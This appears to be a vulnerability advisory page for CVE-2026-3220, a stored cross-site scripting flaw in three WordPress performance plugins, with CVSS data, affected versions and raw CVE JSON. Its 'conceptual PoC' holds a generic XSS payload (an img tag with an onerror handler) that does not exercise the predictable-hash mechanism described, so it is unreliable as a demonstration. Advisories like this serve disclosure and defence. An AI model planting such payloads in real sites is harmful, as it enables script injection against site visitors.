Security Vulnerability Report
CVE-2026-3220 CVSS 8.8 HIGH

Published: 2026-05-18 07:16:12
Last Modified: 2026-05-18 17:05:46

Description

The Autoptimize WordPress plugin before 3.1.15, the Clearfy Cache WordPress plugin before 2.4.2, and the Speed Optimizer WordPress plugin before 7.7.9 are vulnerable to unauthenticated Stored Cross-Site Scripting (XSS) because the HTML minification process uses a predictable replacement hash and a regular expression that can be abused. An attacker who anticipates the placeholder format can inject arbitrary HTML attributes into the final HTML output.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Autoptimize < 3.1.15
Clearfy Cache < 2.4.2
Speed Optimizer < 7.7.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!--
  Conceptual PoC for CVE-2026-3220
  This demonstrates how an attacker might inject a payload that bypasses
  the minification logic due to predictable hashing.
-->

<!--
  Vulnerable Input Example:
  An attacker submits a comment containing a payload designed to break out
  of the intended HTML structure during minification.
-->
<div class="comment">
  <p>
    <!--
      The payload attempts to inject an arbitrary attribute.
      If the plugin replaces a predictable string with a hash, the regex
      might allow closing the current tag and opening a new one.
    -->
    Nice post! <img src=x onerror=alert(1) >
  </p>
</div>

<script>
  // If the vulnerability is exploited, the rendered HTML will include the onerror attribute.
  console.log('If an alert pops up, the PoC is successful.');
</script>

References

https://wpscan.com/vulnerability/3ceabf11-23cd-4c38-ba14-014348b0ff2d/

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-3220",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-18T07:16:12.270",
    "lastModified": "2026-05-18T17:05:46.240",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Autoptimize WordPress plugin before 3.1.15, Clearfy Cache WordPress plugin before 2.4.2, Speed Optimizer WordPress plugin before 7.7.9 are vulnerable to unauthenticated Stored Cross-Site Scripting (XSS) due to a predictable replacement hash used during the HTML minification process and abusing a regular expression. This allows an attacker to inject arbitrary HTML attributes in the final HTML output by anticipating the placeholder format."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://wpscan.com/vulnerability/3ceabf11-23cd-4c38-ba14-014348b0ff2d/",
        "source": "[email protected]"
      }
    ]
  }
}